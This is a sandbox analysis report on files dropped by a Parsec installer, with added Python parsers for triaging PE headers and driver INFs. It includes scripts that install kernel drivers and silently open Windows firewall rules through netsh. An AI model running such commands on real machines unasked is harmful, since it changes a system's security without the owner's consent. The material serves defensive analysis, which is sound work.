                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                               Preview (line breaks restored; the sandbox preview ends mid-line):
                               ;
                               ; parsecvusba.inf
                               ;

                               [Version]
                               Signature="$WINDOWS NT$"
                               Class=USB
                               ClassGuid={36fc9e60-c465-11cf-8056-444553540000}
                               Provider=%ManufacturerName%
                               CatalogFile=parsecvusba.cat
                               DriverVer = 03/06/2024,0.2.8.0
                               PnpLockdown=1

                               [DestinationDirs]
                               DefaultDestDir = 12
                               parsecvusba_Device_CoInstaller_CopyFiles = 11

                               [SourceDisksNames]
                               1 = %DiskName%,,,""

                               [SourceDisksFiles]
                               parsecvusba.sys = 1,,
                               ;
                               ;*****************************************
                               ; Install Section
                               ;*****************************************

                               [Manufacturer]
                               %ManufacturerName%=Standard,NTamd64

                               [Standard.NTamd64]
                               %parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA

                               [parsecvusba_Device.NT]
                               CopyFiles=Drivers_Dir

                               [parsecvusba_Device.NT.hw]
                               AddReg=parsecvusba_Device_AddReg

                               ; Add persisted slots key skeleton under device key
                               [parsecvusba_Device_AddReg]
                               HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1
                               HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,
                               HKR,"PersistedSlots\02\Control
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
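The two "PE32+ executable (native)" entries above are the kernel-mode payload of this drop (the neighbouring .cat and .inf previews name them parsecvirtualds.sys and parsecvusba.sys); the sandbox marks both Malicious with 0% ReversingLabs detection, and the overview signature "Sample is not signed and drops a device driver" rests on header facts that are cheap to confirm by hand. "Native" is IMAGE_SUBSYSTEM_NATIVE in the optional header, the INIT and PAGE sections visible in the previews are typical of Windows drivers, and the security data directory says whether an Authenticode signature is embedded in the file. The parser below is an added example, not code from the report or from Parsec: it pulls exactly those facts out of a PE with the standard library only. The image it builds for the test is constructed and not loadable; its link timestamp is chosen to equal the 240306184122Z signing time visible in the .cat previews, purely to show the cross-check.

```python
# Header triage for a dropped PE: 64-bit? native subsystem (driver)? link time?
# embedded Authenticode signature? Standard library only.
import struct
from datetime import datetime, timezone

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}
SUBSYSTEMS = {1: "native", 2: "gui", 3: "console"}
DIR_SECURITY = 4            # IMAGE_DIRECTORY_ENTRY_SECURITY
IMAGE_FILE_DLL = 0x2000


def parse_pe(data):
    """Parse the DOS, COFF and optional headers plus the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                       # PE32+
        ndirs_off, dirs_off = opt + 108, opt + 112
    elif magic == 0x10B:                     # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    sec_size = 0
    if ndirs > DIR_SECURITY:                 # security dir = file offset + size of the signature blob
        _, sec_size = struct.unpack_from("<II", data, dirs_off + 8 * DIR_SECURITY)
    table = opt + opt_size
    names = [struct.unpack_from("<8s", data, table + 40 * i)[0].rstrip(b"\0").decode("ascii", "replace")
             for i in range(nsect)]
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "pe32plus": magic == 0x20B,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "link_time": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "sections": names,
        "embedded_signature": sec_size > 0,
    }


def triage(data):
    """Add the verdict a sandbox 'File Type' line encodes, plus driver-typical section names."""
    info = parse_pe(data)
    if info["is_dll"]:
        info["kind"] = "dll"
    elif info["subsystem"] == "native":
        info["kind"] = "kernel driver candidate"   # IMAGE_SUBSYSTEM_NATIVE and not a DLL
    else:
        info["kind"] = f"{info['subsystem']} executable"
    info["driver_sections"] = [s for s in info["sections"] if s.upper() == "INIT" or s.upper().startswith("PAGE")]
    return info


def build_pe32plus(subsystem, stamp, sections, security_size=0, chars=0x22):
    """Constructed, non-loadable PE32+ header for testing (not a real driver)."""
    opt = bytearray(112 + 16 * 8)                      # fixed part + 16 data directories
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<H", opt, 68, subsystem)
    struct.pack_into("<I", opt, 108, 16)
    struct.pack_into("<II", opt, 112 + 8 * DIR_SECURITY, 0x4000, security_size)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), stamp, 0, 0, len(opt), chars)
    table = b"".join(struct.pack("<8s", s.encode()) + b"\0" * 32 for s in sections)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

An empty security directory is not proof that a driver is unsigned: the .cat files dropped beside each .sys are PKCS#7 catalogs, and a catalog-signed driver carries no embedded signature at all. On the analysis machine the authoritative check is `signtool verify /kp /v /c parsecvusba.cat parsecvusba.sys` (likewise for parsecvirtualds), which also shows the signer chain that this report does not. A link time far from the INF's DriverVer date, or in the future, is the kind of mismatch to compare against the overview's "Binary contains a suspicious time stamp" signature.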
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):104208
                              Entropy (8bit):7.574113550215517
                              Encrypted:false
                              SSDEEP:3072:hbG7N2kDTHUpouC0NIHo0Ym9eyOEn/y0PwqVMARM:hbE/HU60uI0YAOE/y0mARM
                              MD5:B28AE314664A7E74B8A7A83DF3002539
                              SHA1:3043970C1DA7412C4CE0CCEF44E51AB0698A338B
                              SHA-256:FA1BF84A9D14DC4026ACF706539282F5E3FE1898AF24A2465B6837903FD0158C
                              SHA-512:A36F257A455D2536E7CE3C493745284F0878DC874DCE99D4BC4778A058C7E2EDD67BD21776C7386E36D71FE00BAD1B495F6FF0CEC5838ABFB55EA3D12E8AC10D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................t.....@..........................................................m...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):327
                              Entropy (8bit):4.820064645392393
                              Encrypted:false
                              SSDEEP:6:xzKmgiItAnsKg9r/zITrId6T6UilzKmXBux3jwXvL+Hvt0zKmtcowXMEfsE1:xzAiI+sKg9bzITcdRfz3ajwXDQ0zN1wh
                              MD5:3B3CA1091EB59F0FA9ED9C9A50B3BF81
                              SHA1:BD3A9CCCD279E4FFF79AE840D6397B1E8AB8CBA0
                              SHA-256:94EE200CA574DD4499779048DB279264C872833C96A500E0F49B1342EE5F4802
                              SHA-512:8F86DB66C0BFC7E043EED738CF026ACF6AEAD862410A17FE02A2E26FDEB77B59A1162B1D67868A428F9B0C604A31963CBA8EF534B25AF1BC60448424CA6CCD1B
                              Malicious:false
                               Preview (line breaks restored):
                               start /wait nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
                               start /wait nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
                               start /wait nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):312
                              Entropy (8bit):4.829934939966026
                              Encrypted:false
                              SSDEEP:6:xzKmuIUiItAnsKS/sWITrId6T63zKm6Bux3jwXvL+Hvt0zKmtcPwXMEfsE1:xznUiI+sK0sWITcdR3zaajwXDQ0zNOwh
                              MD5:8E8F18F9109FCC7B93B2770BE222FA53
                              SHA1:E49D59E3161E33DE73D96AD95B41A1EA979C5C06
                              SHA-256:E5A72F8064DE9B266CED03C042DAEF6BA9682CF0BA66BF8236E30E6169E88F0E
                              SHA-512:26402EC20431AC71469B6F886C00183A30F2E8F5009004B9BAD54C5A6AFDEA88AAA56E567CE048A35A76655F9AAA8D86CF69A35AA951786F8A0DA933B7F311C5
                              Malicious:false
                               Preview (line breaks restored):
                               start /wait nefconw.exe --remove-device-node --hardware-id Root\Parsec\VUSBA --class-guid 36fc9e60-c465-11cf-8056-444553540000
                               start /wait nefconw.exe --uninstall-driver --inf-path ".\parsecvusba\parsecvusba.inf"
                               start /wait nefconw.exe --inf-default-uninstall --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
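The two INF previews above (parsecvirtualds.inf and parsecvusba.inf) together with the four nefconw.exe scripts are the part of this drop that puts code in the kernel: `--create-device-node` plants a root-enumerated device (Root\Parsec\VDA, Root\Parsec\VUSBA) for a device INF to bind to, `--install-driver` stages that INF, and `--inf-default-install` runs the [DefaultInstall] section of the filter-driver INF, whose AddService line registers parsecvirtualds.sys as a ServiceType 1 (kernel driver) service under %12%, the system32\drivers directory. The INF triage parser below is an added example, not code from the report or from Parsec; for any INF it answers which hardware IDs it claims, which services it creates and which binaries they load. Both embedded INFs are constructed: the first is an abridged transcription of the parsecvirtualds.inf preview with an assumed [Strings] section and an assumed StartType (neither is on the page); the second is a short device INF modelled on the parsecvusba.inf preview.

```python
# Static triage of a Windows driver INF: which hardware IDs it binds, which services it
# creates and which binaries those services load.  Standard library only.
import re
from datetime import datetime

# Constructed sample: abridged transcription of the parsecvirtualds.inf preview in this
# report, plus an assumed [Strings] section and an assumed StartType (neither is on the page).
SAMPLE_FILTER_INF = """\
[Version]
Class=USB
CatalogFile=parsecvirtualds.cat
DriverVer = 03/06/2024,0.2.8.0
PnpLockdown=1

[DefaultInstall.NTamd64.Services]
AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service

[parsecvirtualds.Service]
ServiceBinary = %12%\\parsecvirtualds.sys
ServiceType = 1 ; SERVICE_KERNEL_DRIVER
StartType = 3   ; assumed value

[Strings]       ; assumed values
parsecvirtualdsServiceName = "parsecvirtualds"
"""

# Constructed sample modelled on the parsecvusba.inf preview: a device INF that binds a
# root-enumerated hardware ID instead of installing through [DefaultInstall].
SAMPLE_DEVICE_INF = """\
[Version]
Class=USB
CatalogFile=parsecvusba.cat
DriverVer = 03/06/2024,0.2.8.0

[Manufacturer]
%ManufacturerName%=Standard,NTamd64

[Standard.NTamd64]
%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\\Parsec\\VUSBA
"""

_TOKEN = re.compile(r"%([^%]+)%")                      # %Name% string token or %DIRID%
_COMMENT = re.compile(r';(?=(?:[^"]*"[^"]*")*[^"]*$)')  # ';' that is outside double quotes
_DIRIDS = {"10": r"%SystemRoot%", "11": r"%SystemRoot%\System32", "12": r"%SystemRoot%\System32\drivers"}


def parse_inf(text):
    """Return {section_lower: [(key_or_None, value), ...]}; INF section and key names are case-insensitive."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = _COMMENT.split(raw, 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            key, sep, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()) if sep else (None, key.strip()))
    return sections


def _get(entries, key):
    return next((v for k, v in entries if k and k.lower() == key.lower()), None)


def _int(value):
    try:
        return int(value, 0)
    except (TypeError, ValueError):
        return None


def resolve(value, strings):
    """Expand %Token% from [Strings] and the common directory IDs; leave unknown tokens alone."""
    return _TOKEN.sub(lambda m: strings.get(m.group(1).lower(), _DIRIDS.get(m.group(1), m.group(0))), value)


def summarize_inf(text):
    """The facts an analyst wants from a dropped INF: class, catalog, version, hardware IDs, services."""
    inf = parse_inf(text)
    strings = {k.lower(): v.strip('"') for k, v in inf.get("strings", []) if k}
    version = inf.get("version", [])
    date, _, ver = (_get(version, "DriverVer") or ",").partition(",")
    out = {"class": _get(version, "Class"), "catalog_file": _get(version, "CatalogFile"),
           "driver_date": datetime.strptime(date.strip(), "%m/%d/%Y").date() if date.strip() else None,
           "driver_version": ver.strip() or None, "pnp_lockdown": _get(version, "PnpLockdown") == "1",
           "hardware_ids": [], "services": []}
    # [Manufacturer] -> models section (+ OS-decorated variants) -> "desc=install-section,HWID,..." lines
    for _, value in inf.get("manufacturer", []):
        models, *targets = [p.strip() for p in value.split(",")]
        for name in [models] + [f"{models}.{t}" for t in targets if t]:
            for _, entry in inf.get(name.lower(), []):
                out["hardware_ids"] += [p.strip() for p in entry.split(",")[1:] if p.strip()]
    # AddService = name,flags,install-section in any *.Services section registers a service
    for name, entries in inf.items():
        for key, value in (entries if name.endswith(".services") else []):
            if key and key.lower() == "addservice":
                svc_name, _, install = ([p.strip() for p in value.split(",")] + ["", ""])[:3]
                svc = inf.get(install.lower(), [])
                out["services"].append({"name": resolve(svc_name, strings),
                                        "binary": resolve(_get(svc, "ServiceBinary") or "", strings),
                                        "service_type": _int(_get(svc, "ServiceType")),  # 1 = kernel driver
                                        "start_type": _int(_get(svc, "StartType"))})
    out["kernel_driver"] = any(s["service_type"] in (1, 2) for s in out["services"])
    return out
```

Run it over every .inf in the dropped-file set. A ServiceType of 1 with a ServiceBinary under %12% is the point to pivot to catalog signature verification of the named .sys, and a hardware ID under Root\ means the device exists only because a script created it, so the device node, the service and the driver-store copy all outlive the installer and belong in any cleanup or detection rule.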
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):465792
                              Entropy (8bit):5.186344682321096
                              Encrypted:false
                              SSDEEP:6144:rkdyuNAbS9p400tm61bXdCwx+3y6kR1DnjvGms7X5od0:rkUuNAbS9p9cx1rdCwh6+/+msjmd0
                              MD5:62BEB668110B4C5DDAD09BB20D921CB6
                              SHA1:F3706372C01D1E607FF8C605307DE6EF2C26C1A4
                              SHA-256:6F1BE9E26E403A885CC3B1FF0E4DBECBC96C0821119D25990C3E211564F215D5
                              SHA-512:8994C3F1C78B0A816ECF30E463AF8D6DDFD0A0CE7B962CBF13E9BBD360D37A024B8EE69C76745F4C332A4786DBFB9216667B1D03C32C60A7C06E85359A2186EE
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'...c.]c.]c.]j..]a.]...\b.]...\R.]c.]%.]...\..]...\d.]...\v.]1..\K.]1..\p.]1..\d.]...\C.]...\f.]..c]b.]c..]a.]...\b.]Richc.]........................PE..d.....7e.........."......J..........(..........@.............................P............`..................................................P...........n...............)...@......0...........................(...P...8............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....2...`.......L..............@....pdata...............Z..............@..@_RDATA...............x..............@..@.rsrc....n.......p...z..............@..@.reloc.......@......................@..B................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):418696
                              Entropy (8bit):4.95147545386253
                              Encrypted:false
                              SSDEEP:6144:qaoZkv+B1x9heMY32Z4iZDzDJGjvGms7X5Hm:4Zkv+B1x9cMu2ZzS+msjZ
                              MD5:46CD3FC327AF9109BD143BA7F16DF397
                              SHA1:53D2A6BCF0D21168050B852E287C2EF62F52F909
                              SHA-256:5A699A165838C739E449AC19A52E0A05B841BCEE1A27F7D348F0DD04C8E277A3
                              SHA-512:D6E35F0DD4F6EF259DD7040D80CD469F27EB460836A4C767D40678CE82B46CE4C38B329C0CF3B41236CEA2F0333F94669CFBEF05EF484D91035F52AD4C1A5CA3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."R.tL..tL..tL......tL.2.J..tL.2.M..tL..tM..uL.2.I.TtL.2.O..tL.2.H..tL...I..tL...H..tL...O..tL.).H..tL.).D..tL.)....tL..t...tL.).N..tL.Rich.tL.........PE..d.....7e..........".................Pk.........@.....................................J....`.................................................L........0...f...........:...)..........Ld.......................f..(...pd..8...............@............................text... ........................... ..`.rdata..............................@..@.data...@2..........................@....pdata..............................@..@_RDATA....... ......................@..@.rsrc....f...0...h..................@..@.reloc...............2..............@..B................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):155
                              Entropy (8bit):4.964195012666818
                              Encrypted:false
                              SSDEEP:3:3FFgNicHnIhoF1ExnRGTAWAJlBRoWdxETzqSHXCF8K/NkPUAA6An:3FFgN/HIaOxnR8VAPBRiqfGomTA6An
                              MD5:2C669AF7EE4ADEDDF72FA0102AA0378D
                              SHA1:5FCDF2480946EEF8F55DAA2DF5522508E45DECCD
                              SHA-256:CD5D52066766B7F0FD7222E551A96C539F17C72DEBD32F8DA9F76DF4627A6DD5
                              SHA-512:553CAECE520111CAB22BB8E92099A2976ACD7F2DC8C8766227F8D64259CC9E3104ADF1B10019B25EDB3A05B92A64AFE5466C661F88BF33F2ECACDA4FE6EDC32F
                              Malicious:false
                              Preview:{.. "entry_symbol": "wx_main",.. "hash": "b43debe8105cfd4e2c8f81599497ad4ad38640f19a64f9e530e7d2f64662bf6d",.. "so_name": "parsecd-150-93b.dll"..}
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):3445128
                              Entropy (8bit):6.632135432033706
                              Encrypted:false
                              SSDEEP:49152:UWvLIUXeaP9CAYaXaAndGk4L8jTMFv43/ruceDSbsRCy9uzY9eQoYVe0OUrVxkov:0I0jNdLrpEeD+vqBlMe
                              MD5:1FF3E1349EDD37A206A97943731045C4
                              SHA1:6D1CFC0C0B26191385CB27149433E743B74D479A
                              SHA-256:B43DEBE8105CFD4E2C8F81599497AD4AD38640F19A64F9E530E7D2F64662BF6D
                              SHA-512:80F91692C22587E76E26C7CA38B267493D4598BCE75E284B3FEF4EF03C64EF8BA91D67BB7BE2BDDD9624E4AA52A67BDEB4B5EAC3A86A31529BB18C44F5824FE6
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$...........Mx..Mx..Mx..D.Z.Ox......Lx.......x..Mx...z......x......lx......jx..Mx..Lx..K...+x..K...]x..K...[x......Nx......Nx.....Xx......Ax......Lx.......x..j...Gx.. ...xx.. ...5x.. ...Lx.. .6.Lx..Mx^.Ox.. ...Lx..RichMx..........PE..d...X..e.........." ...&.\....................................................5......4...`......................................... $/.h....$/......02..n....0.|1...h4..)....5.h....A-......................C-.(....@-.@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....1...`/..0...P/.............@....pdata..|1....0..2..../.............@..@.detourc.!....1.."....0.............@..@.detourd......2.......0.............@..._RDATA..0.... 2.......0.............@..@.rsrc....n...02..p....0.............@..@.reloc..h.....5......R4.............@..B........................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):350968
                              Entropy (8bit):5.604356925971176
                              Encrypted:false
                              SSDEEP:6144:GAR9duE83BYjyEbU1SDgFg8EwkSdbAxD22y6jvGmp:H9gp3WjyEbU1SDAgJw40c+mp
                              MD5:FAA24223985ABFBF64E4DDCD43F062D3
                              SHA1:E1374DC7C98405EFC5A44AA3229B97EABDD69BB2
                              SHA-256:6DC71B2E92B770DCFECA4A32C8F1787210311F731F1124754DF193EC22D5D13E
                              SHA-512:23324AFCB51508F5EA3F120A5787B150A8226D677C5A55FEF219674B4D619FD0D7300D2B4CAD917864D5F54788B9C8546DB2A77AA4F0D666A956014169C4A6C9
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):174136
                              Entropy (8bit):5.0044183901933215
                              Encrypted:false
                              SSDEEP:1536:Gg/T2X/jN2vxZz0DTHUpouk9pbZ3yFu1/s+ZLGmRTQ3E64xE+1x7wWNx:GgbG7N2kDTHUpoukTi+hGmRHxPxMW
                              MD5:FD4427B781E0DCB86E2FBC84BF000B36
                              SHA1:2A4F6C058D137F02D3A2E5D0A8E2A0A4C70EF81D
                              SHA-256:99864EAE2AD9B58075D0F4B2B3CF5B68BC35FE9E187B8695791F041C1335D5F1
                              SHA-512:EF593E0F7286ABFA1F0FE090CACAF4854F31B07E5A0DD39A87B87A4E28BFDC5A45A6A8406DF0578C503560BF5449CFDD65358EAA89C8E8BB7B64475E70DF09D3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):517256
                              Entropy (8bit):7.9435707600028005
                              Encrypted:false
                              SSDEEP:12288:QbLQNEFqf6MouZQqdF9zuAkDjdCjXHSZz2AKhAOYYA:QbUNEFKXrZ6ZjdFZxKhAOYv
                              MD5:4B9A3048286692A865187013B70F44E8
                              SHA1:EEFE91D9702314341ACCCD828FE4EDB6EE570D7B
                              SHA-256:E23332448FDAF5AA017CB308DB5EF6855FAC526A7DED05D80C039404126D5362
                              SHA-512:A38B9A0A1626D9F40FF2C718717A793108C7E773B25493CC53C595E6B9840CC4DE66587549F43CE00569B368834327184A90D55DA3C4AE0E269E1D0EDEF6238D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):907184
                              Entropy (8bit):7.983961364658659
                              Encrypted:false
                              SSDEEP:24576:Ib45b9QaRG2zB9aKXrZ6bcmH0q8qHFael5:CsuWGcjLzmUaHX
                              MD5:2D009D446A0BA83EC2F12242F7ED126C
                              SHA1:7E5346787E8950A8B3F17FB3F527E0F80055F059
                              SHA-256:436088A5EB416935D7BD452E4E53123C2E65B737EAB7D98EBE1913618F95E61B
                              SHA-512:1A3E761F5CB3AD8B4979D60D197AB5FF75929408DDB065080D687BE02A33058A953DFCB8F01E5B87332FE54CF578BED191122E57BB2F0D2FCF7A6874DFAF8A57
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):307
                              Entropy (8bit):4.83986109060373
                              Encrypted:false
                              SSDEEP:6:jeUicmAN+7ysIkgOr39TksxYOpLzLYHHiRXZawuxAWFTOuJ85LLn:ixc3AAjA39TXppmHy0wBC6uJ8t
                              MD5:882374285898F16B5F9FF44AFC1AE701
                              SHA1:31C9445557C9B8ECDA1F0A6D5FF666E01DD1C3CA
                              SHA-256:0BE5AA5CC6395A86878F56B131E13DB4908E48F06E892FF8F8CF9E2D3B6C8ABB
                              SHA-512:3B05158B03B57A4D2CBFEE9CEF6ADFE973D080264A88E5CDEB85C59B567529CD1CD2A3B5D8538CB8637D140FD8691DC8826388AB669B7BFB2D5C1C4174069243
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..path = Wscript.Arguments(0)..args = "netsh.exe advfirewall firewall add rule name=Parsec dir=in action=allow program=""" & path & """ enable=yes profile=public,private,domain".sh.Run args, 0, true.
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):367
                              Entropy (8bit):4.612954361510431
                              Encrypted:false
                              SSDEEP:6:jeUicmAN+7ysRT/mivYOLLLv8T/mivYTq7Lv8T/mivY1q7Ln:ixc3ApT/mivpLv8T/miviI8T/mivf
                              MD5:5D4D70CDF36FCDAA292DA1DA9133320C
                              SHA1:92DC18D3D1128D43F482AB56804136C687B00713
                              SHA-256:75F1DECE4FDA689A907F6D74B513ADB0C1771C1B79EA71160179542C9C4AB2F0
                              SHA-512:B54C92FBECB10DDF66D1B7AD950FFBC13F504C71081A8BD56C28C5689A2BF19BD81B467E0697C38F140C72A273EB9EB837105E738C6F1AC4F43344E2AB521778
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args..args = "netsh.exe advfirewall firewall delete rule name=Parsec".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsec.exe".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsecd.exe".sh.Run args, 0, true.
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):115
                              Entropy (8bit):4.642094539330562
                              Encrypted:false
